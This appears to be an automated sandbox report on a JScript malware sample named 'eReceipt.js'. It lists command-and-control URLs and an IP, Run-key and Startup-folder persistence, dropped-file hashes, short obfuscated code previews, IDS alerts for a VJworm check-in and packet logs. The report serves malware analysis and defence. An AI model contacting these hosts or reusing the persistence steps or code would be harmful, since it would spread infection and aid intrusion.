      http://travcharles.duia.ro:5098Vreiwscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/Vre2wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B6wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098wscript.exe, 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879648858.000000D426DC1000.00000004.00000010.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://zeegod.duckdns.org:9003/VreMcroWinows1wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Vreuc3BsaXQowscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vrerwscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098Vrepwscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098VreMicrosoftwscript.exe, 0000000C.00000002.881056298.00000171E0430000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098VreZwscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098VreYwscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreBwscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Agwscript.exe, 00000000.00000003.354426581.000001C6DCBAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.354234861.000001C6DCBAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881556438.000001C6DCBAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.458352994.00000244AF37E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.881936001.00000244AF37E000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vreewscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreMwscript.exe, 00000005.00000002.883505845.000001B3A05C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.879910035.00000244AD532000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vreawscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreJwscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreMwscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreTwscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreWOW64wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098Vref:wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/wscript.exe, 00000010.00000002.884207305.00000244AFE70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreM8wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098Vreosoft.xmldomwscript.exe, 00000001.00000002.880864667.000001FE4244C000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/Vre798AD7C45B15Awscript.exe, 00000009.00000002.883203781.0000011D6E515000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RCwscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Vre0&wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreEwscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmptrue
        		low
        http://zeegod.duckdns.org:9003/Vreowscript.exe, 00000005.00000003.814806136.000001B3A1155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814853193.000001B3A1161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814903129.000001B3A1167000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWEwscript.exe, 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://zeegod.duckdns.org:9003/Vre7DQpmb3Igwscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://zeegod.duckdns.org:9003/Vremwscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmptrue
          		unknown
          http://zeegod.duckdns.org:9003/Vreba&wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://zeegod.duckdns.org:9003/VreenPwscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://zeegod.duckdns.org:9003/Vre5BPwscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://travcharles.duia.ro:5098Vre563209-4053062332-100wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		low
          http://zeegod.duckdns.org:9003/Vreswscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://travcharles.duia.ro:5098Vre0wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		low
          http://zeegod.duckdns.org:9003/Vre-zwscript.exe, 00000005.00000002.884039179.000001B3A0690000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          212.193.30.129
          		zeegod.duckdns.orgRussian Federation
          		57844SPD-NETTRtrue

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:628800
          Start date and time: 17/05/202223:08:262022-05-17 23:08:26 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:eReceipt.js
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:29
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winJS@15/6@4/2
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Adjust boot time
          • Enable AMSI
          • Override analysis time to 240s for JS/VBS files not yet terminated

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          23:09:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR "C:\Users\user\AppData\Roaming\eReceipt.js"
          23:09:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
          23:10:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR "C:\Users\user\AppData\Roaming\eReceipt.js"
          23:10:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
          23:10:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
          23:10:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          212.193.30.129ZBRvI8mnZQGet hashmaliciousBrowse

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            zeegod.duckdns.orgeReceiptpdf.exeGet hashmaliciousBrowse
            • 45.133.1.211

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            SPD-NETTRINVOICE.exeGet hashmaliciousBrowse
            • 212.193.30.204
            Setup.exeGet hashmaliciousBrowse
            • 212.193.30.29
            INQUIRY.exeGet hashmaliciousBrowse
            • 212.193.30.204
            E3387D3F62414FB262DA20E54D5775A647443B88CD8A0.exeGet hashmaliciousBrowse
            • 212.193.30.29
            E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exeGet hashmaliciousBrowse
            • 212.193.30.29
            Circular PSSB Parts Disc Credit Term (Dlr) May12 2022 (1).exeGet hashmaliciousBrowse
            • 212.193.30.204
            New Purchase Order 4522028497676.xlsxGet hashmaliciousBrowse
            • 212.193.30.214
            MARIAM HONAINE'S CV.exeGet hashmaliciousBrowse
            • 212.193.30.204
            QUOTATION.exeGet hashmaliciousBrowse
            • 212.193.30.204
            Resetter.exeGet hashmaliciousBrowse
            • 212.193.30.29
            SecuriteInfo.com.Trojan.PackedNET.331.26146.exeGet hashmaliciousBrowse
            • 212.193.30.38
            hdk8Z67C7x.exeGet hashmaliciousBrowse
            • 212.193.30.29
            CHANGE OF ACCOUNT RUSH TO DESK.exeGet hashmaliciousBrowse
            • 212.193.30.101
            2020574185.exeGet hashmaliciousBrowse
            • 212.193.30.204
            ORDER.exeGet hashmaliciousBrowse
            • 212.193.30.204
            ckc238HATk.exeGet hashmaliciousBrowse
            • 212.193.30.45
            ckc238HATk.exeGet hashmaliciousBrowse
            • 212.193.30.45
            TjDCLiM89x.exeGet hashmaliciousBrowse
            • 212.193.30.45
            POP.exeGet hashmaliciousBrowse
            • 212.193.30.204
            AFAC7896CF21983233C533EEAEC870610856969D98218.exeGet hashmaliciousBrowse
            • 212.193.30.29

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):21357
            Entropy (8bit):5.2894011150794435
            Encrypted:false
            SSDEEP:384:4HODRv2Svqnusx24EsLEtidkVdIa1bwp/Ehobu+5Tbwp/B3P0:Kk2snsxUr+e3P0
            MD5:9680A56E1D5253816FE0207732F4E9CB
            SHA1:89521E7838484A7417B1F1E2C24F08248A2CF6CD
            SHA-256:36CFA283F600288D1B5D4037A32AAD1163FC4F2CCCF4193A5A9580221FA7320D
            SHA-512:7BE37792E490BF33683B414565177CA7E9A906A0A03AC81EA50CCB30EE480E519F4D7165A4D92351AAC12C014260DDE15BEFA14E9BCB9C6B74480F40FEC1209A
            Malicious:true
            Preview:+(!Array.prototype.forEach ? Array.prototype.forEach = function (callback, thisArg) {. thisArg = thisArg;. for (var i = 0; i < this.length; i++) {. callback.call(thisArg, this[i], i, this);. }.} : 0, !Array.prototype.map ? Array.prototype.map = function (callback, thisArg) {. thisArg = thisArg;. var array = [];. for (var i = 0; i < this.length; i++) {. array.push(callback.call(thisArg, this[i], i, this));. }. return array;.} : 0, !Array.prototype.reduce ? Array.prototype.reduce = function (fn, initial) {. var values = this;. if (typeof initial === '\x75\x6e\x64\x65\x66\x69\x6e\x65\x64') {. initial = 0;. }. values.forEach(function (item, index) {. initial = fn(initial, item, index, this);. });. return initial;.} : 0);.function cushDevener$$$_() {. var __p_7718723007 = false;. if (__p_7718723007) {. function curCSS(elem, name, computed) {. var ret;. computed = computed || getStyles(el

            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):72418
            Entropy (8bit):5.8225967963556124
            Encrypted:false
            SSDEEP:1536:fLjCsEaCSsH70UPi7qzBeIqwitzYNJO4b4aA7pbN:ODfXBeIqwitzYXt4zL
            MD5:251F5F194692E3005FC3C7FF65245703
            SHA1:A783B3612C72FDA8BEBA978B64355CF55BEB9207
            SHA-256:E0E97169CE4F633BE2AB44AE97C5B6D9D23B3C8B0BB99D4EBF6D82E449B08025
            SHA-512:B66EC42775B30DCC946D91E593E084AD739AABA1D512EE8E496D234E32FDA34D5AA7F543EC6C1AC6FA66336F54553F4994D99457E1920E3CB4D3670D3B1CD0C4
            Malicious:true
            Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to

            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js:Zone.Identifier

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Users\user\AppData\Roaming\XZqsVjnTsr.js

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):21357
            Entropy (8bit):5.2894011150794435
            Encrypted:false
            SSDEEP:384:4HODRv2Svqnusx24EsLEtidkVdIa1bwp/Ehobu+5Tbwp/B3P0:Kk2snsxUr+e3P0
            MD5:9680A56E1D5253816FE0207732F4E9CB
            SHA1:89521E7838484A7417B1F1E2C24F08248A2CF6CD
            SHA-256:36CFA283F600288D1B5D4037A32AAD1163FC4F2CCCF4193A5A9580221FA7320D
            SHA-512:7BE37792E490BF33683B414565177CA7E9A906A0A03AC81EA50CCB30EE480E519F4D7165A4D92351AAC12C014260DDE15BEFA14E9BCB9C6B74480F40FEC1209A
            Malicious:true
            Preview:+(!Array.prototype.forEach ? Array.prototype.forEach = function (callback, thisArg) {. thisArg = thisArg;. for (var i = 0; i < this.length; i++) {. callback.call(thisArg, this[i], i, this);. }.} : 0, !Array.prototype.map ? Array.prototype.map = function (callback, thisArg) {. thisArg = thisArg;. var array = [];. for (var i = 0; i < this.length; i++) {. array.push(callback.call(thisArg, this[i], i, this));. }. return array;.} : 0, !Array.prototype.reduce ? Array.prototype.reduce = function (fn, initial) {. var values = this;. if (typeof initial === '\x75\x6e\x64\x65\x66\x69\x6e\x65\x64') {. initial = 0;. }. values.forEach(function (item, index) {. initial = fn(initial, item, index, this);. });. return initial;.} : 0);.function cushDevener$$$_() {. var __p_7718723007 = false;. if (__p_7718723007) {. function curCSS(elem, name, computed) {. var ret;. computed = computed || getStyles(el

            C:\Users\user\AppData\Roaming\eReceipt.js

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):72418
            Entropy (8bit):5.8225967963556124
            Encrypted:false
            SSDEEP:1536:fLjCsEaCSsH70UPi7qzBeIqwitzYNJO4b4aA7pbN:ODfXBeIqwitzYXt4zL
            MD5:251F5F194692E3005FC3C7FF65245703
            SHA1:A783B3612C72FDA8BEBA978B64355CF55BEB9207
            SHA-256:E0E97169CE4F633BE2AB44AE97C5B6D9D23B3C8B0BB99D4EBF6D82E449B08025
            SHA-512:B66EC42775B30DCC946D91E593E084AD739AABA1D512EE8E496D234E32FDA34D5AA7F543EC6C1AC6FA66336F54553F4994D99457E1920E3CB4D3670D3B1CD0C4
            Malicious:true
            Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to

            C:\Users\user\AppData\Roaming\eReceipt.js:Zone.Identifier

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:ASCII text, with very long lines
            Entropy (8bit):5.7986864588558165
            TrID:
              File name:eReceipt.js
              File size:60355
              MD5:00073a5b3551f0759bf070f9954c96c0
              SHA1:c68e16991a3453fc8a33abe802421830efaa1fec
              SHA256:c8238e4ba5d2aafcb132239f682f11ba67387adc8abc80ac0614d3dbe3634e6d
              SHA512:197fd434e1855359afab435997b31f30996bc62e45d9536a2e1f11f221a990c228ead9a653109f8b91b4ab26a25c9392503ae7b2ecbeb30b764eeecff00f61a4
              SSDEEP:1536:KsCSsH70UPi7qzBeIqwitzYNJO4b4aA0f0:ODfXBeIqwitzYXt4Mc
              TLSH:3D43E5DC6E64E4AFC964983A7C3A6CCA47B45A1B8454D7CE781F72405BB8306CBDD06C
              File Content Preview:+(!Array.prototype.forEach ? Array.prototype.forEach = function (callback, thisArg) {. thisArg = thisArg;. for (var i = 0; i < this.length; i++) {. callback.call(thisArg, this[i], i, this);. }.} : 0, !Array.prototype.map ? Array.prototype.

              File Icon

              Icon Hash:e8d69ece968a9ec4

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.7212.193.30.1294977290032828283 05/17/22-23:13:15.273410TCP2828283ETPRO TROJAN VJworm Checkin497729003192.168.2.7212.193.30.129
              192.168.2.7212.193.30.1294976290032828283 05/17/22-23:10:33.772326TCP2828283ETPRO TROJAN VJworm Checkin497629003192.168.2.7212.193.30.129
              192.168.2.7212.193.30.1294978890032828283 05/17/22-23:13:30.858787TCP2828283ETPRO TROJAN VJworm Checkin497889003192.168.2.7212.193.30.129
              192.168.2.7212.193.30.1294978190032828283 05/17/22-23:13:08.959758TCP2828283ETPRO TROJAN VJworm Checkin497819003192.168.2.7212.193.30.129

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 17, 2022 23:09:43.572072029 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:09:43.599786997 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:09:43.599951029 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:09:43.600795984 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:09:43.680962086 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:09:58.479193926 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:09:58.479417086 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:10:00.116456032 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:00.144386053 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:00.144522905 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:00.158965111 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:00.237379074 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:05.678009987 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:10:05.762550116 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:10:19.017642021 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:10:19.048032999 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:10:19.048280954 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:10:19.069473982 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:10:19.152131081 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:10:20.556592941 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:20.556797028 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:26.567811966 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:10:26.567996979 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:10:27.670526028 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:27.745771885 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:33.772325993 CEST497629003192.168.2.7212.193.30.129
              May 17, 2022 23:10:33.841398954 CEST900349762212.193.30.129192.168.2.7
              May 17, 2022 23:10:34.856072903 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:10:34.883537054 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:10:34.883718967 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:10:34.885314941 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:10:34.963983059 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:10:40.598555088 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:10:40.598692894 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:10:46.696969986 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:46.697071075 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:47.762075901 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:10:47.835366011 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:10:53.851820946 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:10:53.929419041 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:10:54.761493921 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:10:54.761605024 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:11:01.956106901 CEST497889003192.168.2.7212.193.30.129
              May 17, 2022 23:11:02.034567118 CEST900349788212.193.30.129192.168.2.7
              May 17, 2022 23:11:12.984889984 CEST900349781212.193.30.129192.168.2.7
              May 17, 2022 23:11:12.984985113 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:11:19.060060024 CEST900349772212.193.30.129192.168.2.7
              May 17, 2022 23:11:19.060158968 CEST497729003192.168.2.7212.193.30.129
              May 17, 2022 23:11:20.157052994 CEST497819003192.168.2.7212.193.30.129
              May 17, 2022 23:11:20.242288113 CEST900349781212.193.30.129192.168.2.7
